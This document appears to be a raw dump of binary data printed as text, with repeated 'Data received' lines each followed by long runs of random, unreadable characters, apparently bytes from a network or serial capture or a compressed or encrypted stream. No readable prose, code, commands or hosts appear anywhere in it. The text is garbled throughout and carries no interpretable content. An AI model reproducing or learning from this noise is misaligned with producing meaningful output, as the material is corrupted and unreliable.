¨ÔÃå2ð[Òäá¼ÑúRc0?}ðœ¸6êæ[î6àYöJÞn¸œ094Ž°ß· ?ÿðTé*ø<óÇ jK'Ç2^}ÐC¨@ÇCùý·vJ;oöÅb·¡B8\×­ÊOùÜ
Data received ىùϤj!ŸžätU"i¸e¯àk¯Kº>% ½†™Ô²¶õ89.IjC·Àé„Ip¨; ) ,ˆŒÜ4µ.éÚqHÝY딁ËM“ž›XM¢< =ðÄh8ʗ3b#Šªÿwð)}è|`Ô{Øcn£WÂKÙ`,%‰•­†«*êÇýè2`>Ѓµ„b®!QL>ÙH ü EßØ;‚ ½þ§[‚ÎIHµ¨ŠlÂãy¤¡îE‡¡fð¶4N? †¤û îfBÿÖd‹ ²…FM{h2[au`ß’Ê.TÆ($ꗇäW.z2ÝôX/XO-»“01häræß¡I¥Uvd%¾áÈæÕ>ýS›‡ŸU¨¢i‘‹¥–NŠ"ábª®Í]ßЛôúE˜¹ÔÂC¢ˆÜà¬Áže[™y¡ˆK¿fÓdÝm¼rx:'ÒÑr8<|“…¦¨°ÁTúM/¨ü°¶!g”°Ûà ¡EíÌÃcD¤Yt¿¬àp*¸ã£™Ö3‚cM÷€é_ƒ%€ÁâÜ×0— æu'bSÔSÎÜëÁ8x椼 qz×·¿ê!¥KæÈ°^~л‹º“M>•1Žðò‘„ØZƒµ‡eÎàÉb¬åޟ)Ø믮™º~(p5'Ë<?Ç“à7I“ h PÁªQ‘n.ç$¼‚™GÚE—áÿ£i·m¯Üÿè²[Ai.DSÝü¨®Œ¼J \^# ×e‰›ÊˆV&wÃÎä{ÖÏÛWî{ž®§l²v*£Llk6” h˜„w.Ïӄ¡ÐQ`Îî¢#;¶xÝY°_¶ˆãòX«üüvDȦõ.QˆÔ4”,`Ì­†™*IñÙëJy$sÛÏ yZ‰Àu@D%Èy9óçÆ“Ä åYÜϤûg0jñÉm›oG"š8À‰e[T€U÷֒ ÛA—”ÅŸæN¡[§¢2‹5/žë“O5Œl–x×´S\è’äÆ/EwéùÃâ£xèUZ}Hn•’ì@)æ£(To;/&j3[9Lš}/ã˜w¢°ûv%ÍôHùÆz¡Ó+Ù(cݳ§h£÷ƒ¼¬ñôNú‰‚ª´uÊÌb Øá Ã+pM‰/êt˚ûï‡ÜèW.†Ž(‘ä¯{¡= J·äÁàBånqƒ:›KaÉ>ª0& ç¿|#TÙl.€¾ëD¹ƒVŽümt„˜>)ÿ­ã°<+ï‰Ê÷- °=PÈ"à­Pƒ$E™êN%²1Ù– ¿:Ê<§ Š&0¸à"¬eüËwä4ŽÚYš´ÊaÆE%í뤄jÖÀ O/fö+åXƒ½+&˜þ÷göoi,͝¾‘ù¸Ú:™øµèP°Ïo۝Ïêv7šÞkÄ)¾¾vµèñÇKì©ñœG›–äsÉźâ¥Êm$Ÿ³š1øž™˜Ä}¢Èۍޖ‚pwŸçµm$3Òÿm¾Æ%Ÿœ̦%áš³œ_CYúsqKýhÃù¹9v^#ùWÎÄsÔIàHf}?ZPÙÒöÁc(Z$è'»’öòU¶ïÜKÊ̦Q2 ‹ ²âèCh“æƐ¾ò%Znœ„v¢ÆÏt×#$kÞ¡‡ØNÁÜ œŠ·]>AGÍãÚ»³XÝÄqÐtž§ù¾6<ªÊobƾå9/©Í_PS»žÈˆšz%Q¥€†6¡À/m»O$ƋðEíˆù·÷¯ð¶qÒf ­˜X5_ýeÆÈ YO¯2ÂCìèÐ.sk*”P¼åÉ÷éâ¯(ü
Data received °
Data received —½’¨ë=ž#ÓAFÇ(‚±úJ–ӁB†À0­JôØFÇäÄEí¶ ´œcBÿÊ÷“›êE€œË¦éW¨ Vû@ž&nLÛ+M`¶yÑd†YúþJÍ+(I3¶¹A4e½:%Å_Åkt`øÁ„o!A¡[ÅÈ”YP½Ñzðì.(SѐŽQ“™{Œ(þ“ÃÏ>\4 G0Çí8ÕB=Ÿ®9©ñ"hâMáƒ9Eªã9gû£{}`lƒl˜½/_…ùk?!øº”ð aëNø#çÌíw’ŸÓ¶’’ÈGs¤Ê š{ró~r²")þþf‚ËtJæÊáˆC&[Ö¾ŽibzŠ0Bm·,× ´¬Ïv‰Sýÿ±­†µÄA¥nº;?#Ú¢ÞXÜÙ0å¾íÈÛz[†ÉVûV–¯´ÀEUŸ.„g@¤1„ò7ÎùšT®ç€aåÝl"Å–&@èñ¬ùî4ºù^¤Õ5î`ié5ñҜ¿Fw‰¾‹l®—qB¶<½È:+J+»¥¬úQ¢ìÂÝ¡Lì~M:¬îfƒ÷TÌ6‡Æú)B7Xˆ·ÞíC±‚¤é,N ôœ£ògå bÄ q!#°‡¤¼&‹i±_Köô㦀ì2Ÿé4ٍs'SuFÚoéóZE´x$Wr½9r8¬~3 B Iìê“Ä'¥4QVèÉäµ'¡d`«D‚|ýo­Õ³ÜDPۑcž3·;gla9‰sض2¾ rC~VI?ÒцUgçLCRa^í„ex„MØ(ø´TÙ“)SÙ­¾"iñé_Әï-ùåjn|ö˜9*çÈ`šÓÔÇIÔ91Dåð÷ùɋ́\fϳÜ߆ñ¬‘m_d£3òU-©ávÔÞ;IV£Ž[þ]Ÿa¹1U²ºô„ó#67œ”%äIQ1ϾüzˍÔǸ$>Á’{ÇÝmè$ì´9þ¨ÈJ„¡¡_ƒøQ½¡Ð¿°D ™už•_æ \@Eb/CÝÿTœ·6®[§)>¿ðö$xtfqÂÐjuo]GHÊL¿e†1¾+4¢´Ÿe°`”,s¾Ÿ3‘õDæ¸H2ð ]¹¸šqåpŠû"&ÿ^U”!’pGs§û¸é}…Èô8æ½ Ë M®*µ N¹ÑÞ2´[„ -&ÔJÜ@†á‘hVÇ †×ÑGzwUÕÆO{±êQ%§XPbf0Rėã 泋„l È:Ç©³ørã¡êIßÑSȳ'fOçûÒÞý¦Žý&Û(»ç»º3_Èö¤ ==șJ2æIZQ7_ÇKj4j{7Ǝd‚s&6Ï-ÄXÈᦗ7B<»|² (¹úz€ÛQ]š}²¥6óB<ÀœÃf=ŸÐRl£(Q}=Äx˜bT€^f—sÒC`Áå$Y.tÅäüÚ£ §«dė,G(7T°'sbÊýUÑøÂâqþát‰8ùÎŃJÏ´µ÷8¯ýÐ ƒÄì~ŠqÛK÷P‚Ê©I@BBH¾/}1mùÓmO~³ðZ‡ÔK’ñ#uä’Ù6¥ßFuÖ×»)ÏóþsåU
Data received Ð}æ¿K¹‚–ÊP ã(ÒÏ¡EÙö™ü)~ÕïúLû(8LF¹¸­ZD†2¿²ôf~‰8ÝíöIüÛ⣾þÝ[r!–Òhž1”àÜTyWœ,¥Ìg†³¼¬Ž5¸¸PîS¼.÷µÊàh//󬻱r«Þ.ôŒ!¼j ¹¨?vBžL‘ñ**›÷i„Ó®Td‘ê¯íƒÿžÄ§¶×9 ¥Sã3W²×4”?Üa¶nÃXô¼¢Œ©•¡­«Cè«8 CHÜ#úäùæ ­ JÎùrñ±ìC‚\ÛVç-³ÚVãPcr±r½ ¨bEÈ"P‘=-.˜Âüˆ ;1î¤ÁlêLÆœÛ×)Z;'W’žÚ°Àêôƒ:áü¼ ÁB¾ì§´—©ø˜
Data received _ÝgÅEr!òÔ^O}¡øl×Í6—v¦)PÀ^ƒisH–D…*°´°°l±®(Kq:­‘Nd{À¹è,j’ùzI„˜$vd7|._aNŠlÇÌ[y— µ×¨…lv*qálpÐòÊk,IªG®æeÜJӈfÉvÌ¢>SJ¥È9¡Àíñè†Þ«€‹K‹!Òݧ¿IÀ¨ã>ôJË­ÿ">#aqØhè@òds·’ÞK7ŸÄ$ßÏKEgӏ ¤vkÀ'G,– Ešþ’½ Gm 9™{æÂtœò-`vh€–î_ ÂoVÏ5ì7jk kçá8š`Ȑ:ÛAŠB {@^m×jšwlB°ò²N³‡Út<X9Ńd¨àâ´ ß8{š¯d¹ Œ˜kê¡€«híX~9]gêßË?\÷#åÊh±Ëø؍uì}Z–Û~”„E-2…Ä=ñ2ƒäN6w2(²¯WÆ4ŠY›–àTû{­ÞÏÿGù!aî ç‡H ©. ElpsÉ/ÍÀWë¬ëÎàÿ²4/Q!™ËLÄPM§Ð‚ìòZÌ'S›Ç$è{ܙƤ|0¢´±tÖá¨d¹ [‹Ðôsˆ Ö$5Ko.óà9pû×­ó¼qˆ=ÇAþÓæAŠDϬŠè¨³JŠrývÃ[= ˜œ>´E^ïBïÞø35†&µs¼ÖÃÔiòÏï ó€„ê&‹¤ŸÇdzä¤ó(ōɶøg Q¦ ‹9"d\§,´e®Š¡91Z€/z½ªd{õÍ΀l^Ó«Ro4Uf ˆÎóOVæ+- ÞÑáöÙЮX’Ê¡¶!d[bŠ sŒ‰Û®Ç°}nå£usäºْ™bøgš4ò¤ˆÐ™å8E+Î Ÿ¤-µáH'_©oê* Vgõ`ƵD‹׎AI=gªØÃÝ%$|5ÌcÄA… ̼T¦ªØƒaåzµö‘ ä ¨±9 Ðÿ¾I†h·"HÀ°Ë)ìNÜ< v9q'‰ÈVÈñÍÇ*9¶žîƒEn¹ªÈq9tÉÔ׎äù؏…Jûüpé€0|×Í_.Êu7ÈC«¥T£HCYZûIú´Ü”‘`§•¿ÆÅb+3Ú¹?ã¤[Lßóø3è”3VEn'í9JÀ…¸9ÉêlJñžH¥ÞÛËéjÃ+®÷‡ð9#Ú»%ïš°^}ë¿NxcƒnLcvÔ ÑÐ͹б ¯T z‚y¶Ìé¡¥‰ŒöüvS¤N )þ»ê<øeäÆ·îš>®|ª2Uš\P&üütm$Øur‹å*޼ƁþìèFk:"¶Ø7©Mõ'æ qÕKn÷/¦ûò"z„ðڜlÿ°4vÝ=T
Data received ˆ —|÷SЄÖMƳ­£#É #ê —kõ½ŸUSŸ›í¿jàYqLn˜FÿNvÓ× ›m“=ˆrîèr@æUN‡P›45ÜUÅMQr[´îûÚ)ÚÈð%ƒ$˜OgrmrBÅÇZÉØÁG\õ0—wHgRüˆÎŽh*åéY >_ø.åÜìAÖ¨I‡%»Š2rÀù ä¾~Ô#Ã_ ²È$8“wP딖XÓ<¦!¦M\¤¡Uî"ъž/›ºUM¦/°“žQŒ Æ¿þW×Â/ Y%­=„Ò—tgÚýÊOˁ™4vƒyÚhÿ¡7%DÃbÐIâ¦\6 瑱$íD°HYw‡'¶®šÜ·ó!›„¬W,±ä\Qº‹-òÀÝY)ïÃó9x1ŒdSÃxÄ«2WÆ f‡GÎ(\º´ÞŸJe(be„¸—T7”cÂÊ!Ì;²ï’ÇyU%ÿb8 ¸“Æí5POPü»Ob+uŸ2¨J1ÅH qÁÆ5*/NrôdÝC©N…ñÝ׋tˆ#rԅ!ÿ6.ïìW 4 <c& ³»ÝÊ®&)ÿé6Žâ0êÆáµæ Écœo}«ý 7ƒÒcDa*Û*¹˜¦¿±G­Ù)MÜe¯œ;4*ü/ù7Œ€ÇŽµQ _ܷ阶Åñ¢ñµŠD~¬Êm*ú'YJNd6lx°Î@ÕùÍí6¸f+{`V’üÕDac$ILóhݑã¢K7Hɶɯßá:¦kLµ‡Ì±Ld »$´ /)ÕäuëVÆ»À]‚ÃLF²•a«€S燆íx ïo&œw+}÷ýט‹/•Vûô}º®¯bÐÉPo•üº¹)nØTòúœ´äàåD+õ÷§¨a øìö…X±Îµb6`ˆÕܹ?ҟˆ§4]ÙÛÓç8ËkDûKùZ8ïÏ_È¿à>vbµÆbí^PKÚ#¢ß†Ø®}’ÈÛÚy5®i+k¨oÚá$ſᨨFë‚6þÄ=%…ȇ$xûÒ¢‹œát} @EUÖ²x …ႆÐߞ¼ÊKnE®"ìíêÿ–›R½æ<BãÕJº”0n ɔPŒBWƒœbýÇø‚!ùªßãåL)x,c8L€-¾CB°µ‚†œŠ€@v-á)ƓtÄR«í)ò6®\.j*±ÿâ„¥âöKῪsãÆAQì@  Øò}ÖaJ/éÂôl5Ç®^j×bѸ_Ì÷N$_™ÂDêÇ9HK2Óé{Ðyé–#ú˦žºîÇÑÞ8Ä{°<¥ô3m^{5‘óí¤CG÷•?Õ-Ê_Êð3E±G¿¢kskùv;ZŒ EÏÀ(쿵3!"ß"ˆ¥ƒ ÞÓ5cÎéfúN(偒ÏüÐÝԟ/ppÜÎI«C°)S£„Ž0:ŸfVl¿,Iz?½b‹¹üšÜe³(nFˆì+f~Kµ€ÃùDÖ"6:Ù©Õoì_û*tðHÉÅ«ŒxÍyØ76AŸíŒºéÊ0½$zܪ·ÜÂ"†ŒòÉ ÇFÇyãV?¯zðçNä:(mdø‰B},Õè«ëÙ÷Ф#”l~Ú,ti$,àª,ö.ì};p·ñ³.B Ýê@ü½ò;¯Èëc˜$E í ‰M˜ý28Ä(§LØxŠ¨ØÈ" Ûm[û„aîþӈ/-]ehýøÒø…ÂÿÇÝÓ*ïšßFK–ìd¥‡,;B5Uƒck»bëÛZ1¡øõ„„;í‚aÄÉÈ÷Ï5̕«ºÊéÁ8?qy˜œ/
Data received ÓG@'CJúê$"Ú?Iž¦±’åÇÃZêè„Û!^ UÆâŠoƒ÷úWéÊ¢ŒqúèXìLá:(N½%>«FXã.ÕÏceCOšúbM\š3ë<2%HCh’$ó/‘iW 8ÉQ[Ë샴W±¥Âo–øè׺\Ô4uoÁsÕåꃲwEÑ|¤Ï'£y¯‰Óc¨uÀž¶ÛÂ4c6Y½9âw×GçH»ôD®<Ç ·܋¨Ü ϐK¼Ï§¹Ë±èŠ¦hnûËn¢oçÆN©žð 7Vön|ël°­¶Ø¤4¿eTª¯ýMˆ§Z,!…Ûµ.żQنµÄäöG×. çEóê·âmÐûÜ/³:ã¹óìšá (â6eâ“2è·´cS RÒcÖȔÕÐC@Ù7›Þ`;‡¿Á!ÎwD‘­•žôÎIݐG¶f1‹«Ø5?^Õ~÷°ŽKŽp18%è)Ϝwc €OÌ_W>¹ZÙrF'Ô¾¹ŸBHg–âr`XJƒ ˜(XJT, zB9¦Š¨ýëÜP—• ¥âhÍ|a¾Èh²¥¡k<æ®I
Data received r[·µBïêuS}µGvÓØÍSž&kð‹‹#ýH*<I ³z½îmàš ëÁ>ÜgÌîìøxu²qªTp@GíЉ?"îö¨#P³ó¨!Ñaƒ^[õ㦹Dœ½í Î7wØ9«Rg·K¢Õ€c×_³mÈ|*tîpT*r 0^šç„ÏKm!ó‡&ƒ*­J>–¬®­äsu4R“<{0Iu4ZÒc.ùdL‰&cÜ¢ùhď:W ‚®SµwŽoÑÉs¸ú‰Ûð'õÐu·ŒyÁ¡üõêëh×R¥ˆtOh>wµ56Æt. ˆÛÎG 9S.†.Î|¿™ÝÀ–Ù¸ª{eˆb_&eõCáÓWHˆ.VLðÑŒEµµîdl÷ÐX×ËÓèhҁa£àØa‚ É\,A ¹ëò®f—iŽÃBdŠíoÔpq”ÏúО{"±1%P$tµ<"báñ¢"‚{-›Šî¸>†£nÐáÚã:ø²HìGÓɹÈD±/+e’™ î3$¿é„‚³Ìí Í_Ì>:…p¢!´«2ƒ$B¯.1 _m.ÛÃ'·ïòh }㪣›øޟµcÄãyÇ9€QWN¼íÌuæJ.ªôI¢ƒ×¨"]¡¦”¹„xßÙ[x8”Ü´ïi¿c/¦£µ¦0>ö#ìyÄdÂã»…¦™hR”ïÔ(ÉÊ*?Hמ1äöI»Y;º~n$clWEUÌÎê;SZÄ ¦Ø"ñ¼sÞZˆ}Mn£Õõ1)4ÏQ7“XVi¸Âÿ5<@Á =¯2÷}Œ­}›P҉Ñ./‚ç:äî£ÆAë†l‘& E¨jÆ^ýÒ<8Êtª\ ImÖ'—¡ó­sÆkfYíjØt«¢O£ qîý¾8.…,@ö´`ëMÞr»ïÏtÙí%°î¢-X e›#׍ғ¨šJ˜ªK¸»Œ•µßƒŒWqáœûhÍc"ñÖª§™vÌŠ¯L®ñ㎚B·Ÿb‡ê8èYLT#±‡$Ša³0òídº¹0_Û¾û¿xQæRÙF<xáÑ_-ÖaDÖ9XeÕ9=¥]— 4ëÒ´7Ғ—RYÏñ¢’¥oï˜ò\|<Çgªë2k& ´¯jûXMpù-Ü5ˆ¥ÒO¾c÷#”¿êþ¡ Ï]‚éøÀŠ;C[nOÜh7HöÙ&{>°&•+º„êÒ¾2oC9XŸ|¥:Ê}¾yL±8
Data received :ðÿt¦öìK:RRÆÜñ‡5Óg?E¿¤Gy-¨Ý»‹¡$`½ È ¯Ä„¤ýلVõDáŸÒsRç÷OM¹ ¢ópùÁ?…†pðý Kgáü1èüsˆÁ’’ªt÷ÏÕàüø3m@¥ˆj\îÇђ/ó¥)rÙöÿ„dFþå'AI‡¬òƈ…ô?¶˜(’0ŸÊ,‚î<|á7ö"x ½ ìŒn»»Õr÷û,;i—FÊdžM³¶ªU¥÷íò€Ë „W*`[G;1hm ü6ÓÝpâE‚Âåa9ªëWòªõ£þ˜|ój Ÿ£°>~‰Á¨Ü†Ô«¬ä)Ú_̉ìZUM½Ê‡ðz]æÃiÀg”ÍgaÂɐÞß7Q(%pòˆM«ž_Z±ñ$ÆaôŘ*)ë/ù '±™ÕûLÀÒERÙò’è¾½Xhc1êr̬3»!DI¡«dY“žŸC­Œ–ŽBѽ,)輦ÖÛ1‡ŠCJW†ýœNŠ ³0íµ´7Npm0J;§l§©+í~aÌà/>]ž³öm´jºù/ï}×4ؙÔêе]^êË <"¨.* Fsë-àŠuiHÔÍež¯ˆX®…ðá ]¹[¢” ÞÐôˆC‘×@GjU„ܫȲ`°öA†#3š™µ©Í ¦žÿ¸¶NgE_ÞØ61<aŒçûϹ b©Ö:÷¯íÓZëuu Yî™U÷_•Ò¹\ƒÒó‰ÐWç¹Cf¶Îz•ýø½=” é ߓN2ã¦ÌW{qJVӞƒaäIF.òý£lcN±V:?fˆ~öW°ÒÛg8a†œùH{Êo%†Vdnär~“D÷µ‘'áêB|ÜD¡ÌP‘%.¬p¦‹™ä۞<áSÈ&ž …‚Ä×Âå?øñ`BØdW€^UÔ;QMÜ5L–¯Ó#—ã6o„˜H½E¸±z #1.Ž5 ö»?"»ÿÃñ¼Ã>X䅅_ò ÷üŽ9Röäü]]·ZòF¦Ê¾3±q1ÍôK‚"Óì¦Ì÷ÃqW«x~$“o£äÙû74ó/¿p WØpLÑaˆÙW‰,ðE¦3[`çòê9³…¤ÿÐ:þ‰8”…ÀŠq,ZÊö4èâr4jî{±Y7mü’1’f#Ár"Çr±?­=½Íϼ§æTŠ†£«77ƒ\Ý`z#Áû†&é-֔‘4²;¸¨_(„¼m¡”ô®*LsÿUô]ª6f-‰¯v¦&–XȱØÜqâCBòìÂ+ÌãÇ:h춁¡1å÷ßËjNÊün[B Á»Ô³hj¿ÍQÏ+›qtbZw¿Ô;ä‹>¢#îð&«µ')'èR› –þŒzǾ¶<¨íʔžÑÙa§ÿW»'Á†øËÏõ7wó>4ôt:»áòà¬öè$wuâ­\ÎÆÈ΁$ÙõãɬŸ*µ‡8„¤–"r• a>vúàM̶O93‚¿HËò±ÔÑ&üCâáVïn~°¶5K‰‡êd^þ«TÕ†qÈ$[(_h5dÓµˆ*üùš‘œÄovHÏ/߄Qo­°‰z÷žÚÝtÐP²p×¹‘À¾,Þ7ՉVþç¬}æïù¸y¯®U˜•-wèb´Ãóºâ›xªÜB¦w –E{t×=ª÷bWðL?¡ðKnóÞé]̳À²æÂi62wøᎳMñ&¼þ”qÀô%9ú«ùømš ÕGÇgÉfjS“YÇ:GW¶¿4֎…Úè)E·†A„W¥€^Ðâ…ò(ž@–²2Ô5*HgI¿ÓÇ{b= ±nN²Å— ÿ
Data received —ùÈdë1µ¾sÝY°ñ‘ÌН{ÐÁŽb Þìq³Gg6ÚoéX–ºŠÏ-vƒÛõåÁ\šìâ»œÛuW‡kìÅü8ëý«ÁmNòÁ.ýLÊr½Z9äÕÈiÃÍ·ò_wÿîÎ5‹¯RÝØ4JLΨ© ’;ý²-8†¾«g‚1:Èa›æ¼k–¹¢Åø¥МD»gH{ƒh²:ýv(˜c¹‡>ŒøJI…q»D˜*5°x"Ã4óü à>K¥9îëÃÁùÌZròfQã§]iØŽõ0¿¬ÝN-w mý&Èè<ùÝ3åB=ó{F6Q ƒNß8¸ §m Ù5÷lêô¨ç³,îK;Ê`MôK·4Û\55—õŸÜuɊ[j`±+Q½|_3£[HOò”»&%ºòX‹÷!3)Vž®}¬yhP@=mPKë¹àÜ»»È™ÜÐðÑ£Æéáyå^jݲã `ËÅ¿Ö«ã¡U®™«Í7(ÿ%"ä»×µXÝxXÚÇü¡Øì1€®c^•]¼²›qÌɾã¹ó—ñDö?évØ,Í  rÞnØ#í§3£BUßÉÿ·¤%«Ù™Ÿ/ÃìóUæçãRHÁàÀÆûõ¿¤¥ÓÅ •›'ükÊTË9Õ8ºw•]¤ýÿÒ¹³š êªÞlJ¤Îœ¾_wTø –î ›ͅf-}RÔÕB$
Data received N´NI}©’r´âÀÔ©_[d`8¤²FFÝo=Ï.·“KD’˜(ßÀ¡ÌîÃè 7øÌÃòö&êȂ‹0¤ã_“Jƒd¾¸nÖ:¹õò›‰­f€hQ Å@×O}VŒî :6àÙIZöì=FeÒ šîmÕØâs,Yœ_üÂ*hc‚Y(ný:Ö°›WÒªýÐëvâü'k$ÅÀžæm F Àx©‘]ÿ(óSÁ•\M”%Gt'™#VYfz%6›ìÙۖ7g œÙ¶x{¨ù£Ë¡äbÿ" 6¯6éV9œ Ó´k¾¯ðîëËá³íI“5£„³¼'VŒ¥¥ÏšÀ¹Ñrú|yÅXŽLÆIwy=ñ_j¢·ÉFiîÔ1fЪCzWÆ B &^…Lé„n@u7èk¿¤·J^»‡Ÿþ¿Â¼q–êÝ m6 c‚?ÙÒF0Àv[.ß «èp‘-ú6W 9¬—ü|Ê̑)å8?\¢•ç£p’QR«>@=—¬Íò©)×еÂÛxOlŠHk qóŽRH/žÁ{SOǀMá?¿Ó£]ón,RBÀ ¥bZ'Bèã¹Sͳ}Òdy/°‰¥Xbí%ú‡0ˆý$¤0Y‚Îû4™ý†Õ0ŒNQ”l]ÒM„è“ôh g‹ÐBÞ4x±‘‘ñí9î5©”ä|=+««AËöLVïìï©ñ0QŽM†¥½AßlÂe½ !ÀT¤z Úퟍ¾ùÉ\ùœÞ ‘æÏ0×rēÏED]û9ýmÈۋQ8âVïÛQ)O-,å£ ˆÒ؇A¬**èøýBL±Ó–tÉÇì»®Rûp—-x­ÔňVÈ,#M2ñ<ò•F Hÿg߇|7˜L¥Çp ¬ûGÀbZ¯ú~îa0jî[/Æ —rqüËÂ<˜}IÿÂXœˆ‰ª=1ÅZh^k¥ÛNJ·‰\j‹\³@‰~É óÓãµÁ¤ô¢e¯¶³Î<óµ_æÝô6e¦åg7ïnnöùÛ«qX4ÕÎüVWðʄ¾ÊĨ* {'iS¼£â…=
Data received îYi¯ˆF/JWq/PÖùl•ë¦ÜpiM~Ñ °Ù(‹ÀÌ|åx¢õYâÛæ¿õy¥ÿÒZÚãR¨wV¦:FiJM`DEyYYnÉ4ã¦ÀýšÝóîÐoÖ¿úI†­Ýfµ0öõØø$ëKìBpäEWãÆ#ÌǦK8t÷åÍó«öæ3$5ē#JCb~ÐWàÈ6Vßfa4Ú(@H#›®¤O±úÁc]1h~·ˆÏа®~fû ,Vq>•ÆIÛÖ÷ð»ìWU20ß³OÊ(„í<g™ŸB©)"®yrZ¦ Õ° ˆóßٙ;c¤¶«#7ʐyE?9xòÁtŒ0d4gó‰ER*U:Þt¾‘R‹³@jÔ-hËaIS²ïÇTôfÁI °¢îšù› ZŠJ´¥[H>YWƒV:* ãÅÀë1‹rføjʬCØL<w|,âeK¶ïó<‰|ò8Ëûìj®žýÞ|¾€Ã]TÜÒMN–½:Öèìÿ²o†8å—v¢ÑeóÿùYÁl¡ÿ1³©ÃõH¦Á#¡gNæîXcʹþó:P¶W£\—ŠÌ#öE?Ñ 5V:s¸Mà£Gèâ«ršÒ®øjlœŽJ«x°§;bÅCŽqœÐb>E4 NÜD4ð˜‚ß$ÆÛT}3kùÐÞsï¸*CüQîÑhοô|y”°•µ½å၀ODMOn;5ï̽ÆsÿBJTZ)øܪIÄÄ¢¡„¦‡Äir:&³ kÞFq Ãí»žd ¸ÂåŒÍFè©:¹@£;Õuáã¶h(xJ øÌQXz·
Data received ¼}Ê~L"UQ³öÊùÂ.hHCpʔ‚¬§Br>…Y9@ñOÞpµ¯`yÈSF¦ZµÀò*±Ðd^õ“Ǐ¶†ŠÏÀ1Ï ºÆMb2¾ˆ,AµÀ&bž½ØT¾k5Ë£ÁÃ=:’à5„ž® =‹Q2»{¡•Vï%/ š¦õOº^@úœnï^c#M¥Èƒ;ø¯¯@F‡üóDÛi {®ûÈ¿;—šØ¦œ‡¾Pæ&¬Ú×ñÂê=5ñZ$ï÷¼úùÜ©¯­çÈVæWë­¥s‡u[`Â*hË#C\=úAg¤Ñ”ÇÈà–ñ«º¥{!à0:{QA.É» +‹. „œæÆQ´^ˆ˜åñZ(oY28„Ö€éÚÆÐøÛ@ô´žÖÙKeùt¸ÈãçþÛRå_¤ÁV#oÅ ÌX:À¬GÞ¥R¿çZÎüüuä‡Jùbf¦çÄÔ\ºµ/CÖ¼ÕNz¸}¡„õ¤ÂŠv‚J5Ü*ê£(­/\í]+ « ƍNq±±ar›ê”öhÜÍEªr”e !+Fûmž7·…«}¾ÃhæK81D³Z♺ÁŸrEƒl»É ›F–«×~÷j@ù —ÕVQ™½NÎ÷!?ë5íju4B`-x¯NªO抭¬¯yB`ƒJ£g7~#‹:Žäû.ëïC€hÕAO2—y=˜éC͘¿q“Ú»ç[ܪlǍ¡¨ûÙ®Süëà îñý (Ÿ(U8‰tºØ­Å{ Å5»Ð]”9žú(ðy 4n—ªKP‹Úì÷x´6»KjƒUXƒx ÜGr'7ՍI?Q13ÒLÎæ2a%¯žùv]ħ-³¨úð~„®Î]œ‘·|4 Í­Óçµ? × 4y3wùN&n æóSðÈy[f‹¨a‡ø­›{Àv7ñ'úNCù½‡¢:¡f^:Ó?ìÙÄ؆;7ɓP&þN£ÞíM$Z±K˜òmӇâKv@7Sv
Data received sæÇL49_™›þî_aràÕz#s皬¿„ë&ÒÉX«5ʏSðÂ¥!ã×ΛšhIƒÁ^‹q­ÒžÚt$lõ‰Ã:Ñ‘ûw… ¿‘µ‡Â͸¸òªe$-èb_ê—B–Ñð,#Kbçw‘Øæ¸ÝŒƒOjzz$Zò,$VÎד ŠÆ'›¦ãÿ ÷ÀÓ èZwã£û†{ÙÔjÃ=¦Ï¡ã‚‘Ðà}t¸C SÏý™V Ñ,Û_¹°7Åø@®D!5¶ç–Å|cþ>/ûw}ÝQyf•‰±7Íü»×ëß S1÷¾kÖ7‡dÈÙ¥dAýcæË­9ÿL¹úø6¾ì]ï$Òȓ/UÅ 5ž’Cý±0yQU Êè‹6õƒFb7µízEÁfÌ%Ðᯄ~P×>–224É ¶^X~‡©‰˜°ÏÁ+ÃZ›hú.(YŽsnlpœC™Äùç<ö6ˎmŠs{H~™o…$3Û øÑ¥ .³0 ޞyàð–õ*àÕT}œ L€× x8Ýæ[ó·€ÃQ. Ò¸èŽTâùÓ½û 0])¡8®¬ÄÔƒ@<…¬…&Бú۝ÓN'>¨ê¢¹4l8ª¡ Àw˜^{×ÙPkRmÈFÕ58CDi=ÄÅÎÊã>@1„qº¡ã®¼æç[sšËK*ï‹A+n~.¢ èyé1ÄùKjTjû}c§Tnç‹{­°=ætÝу{H@…ßA2í°S¤¥â`}ÅO3ÚË°Ü8î:«XŽ„º ³oößÒ@g$DáóžŽE¶šŒoZϐƒjËO/¾~¬tHºªÏJ3{ÂrÍ-c!¤—G°(,ôW›û‚OÏn §}”¡€7~Q’ïðy¯õàËÐÂ
Data received âôv¾œËD›eø쇜nUЖ]Ü|khƒºéyIôBZAƨ1#I »«Õ FÁ fH–PxrP™½nû³ý5p(¢Ãs,Ô§™¼$»LIz^=LjG7€óºOÌ4ì*1êwìH‰È^£^½—+GÛ°ÙD\¿Û*²(mX7xßW ¾L%¤Ú'x¯¾èAýAQœ%ç1ï³Cü€ i.fˆFuMÔO©'v³Ëø¼Nœ´ñöŠœ„Ǽ8ášÕ-Ð{2ޮĪ¥à¯d ý{bb,܀y©å8Äm5DÚ4î?7û¦ÞååÐ s“ãɾM̏®XyB¯…a˜xFþPÁ°’o»-q`Æ©‹v^!5ø9­…±vEKéROKÙZfÅyp ÑZñÇ A’J±ýàPù“³‰ H‰5‰®†_ñ“*û¡mÞ[O§í¶ è.ZÅ»›ogn=Üú-xílV“̧¨z R8ÉaNjyþ˜‚»õfjÛ,Q&ó``;ÐDdrþÝÑæ¼¹îø†6Õ8&ænˆùcb0ßW^藅/b9×îÄ÷­O"ÌuòÖïú¥Ò¦EÉ DƒTJÌÞàç-Ž ? ªTćùÇßQùQ’4špù XBƒQD˜vk ú ”wÊc‹ì¾ÜºSs¶S¼ÅÒïâ%c®ûÀ0ŒÚ1Yâ>SDK–áû%"GjKÞö«ÚŸ¶Å »¸ew$àñµãž¼¾äct_¬údZ…œ›ÓG»€TG ·äöë¼pd‹®?Hà¡^ÁŒ‰ñ<w~ànFG»£öÚ7 jšEp‹qPàlY{‰0zLÿ FÌ&Ïr,^z¬î»¥Ú×25g“oÇëbnô׺ЊŒÐöø®yҍF#¸
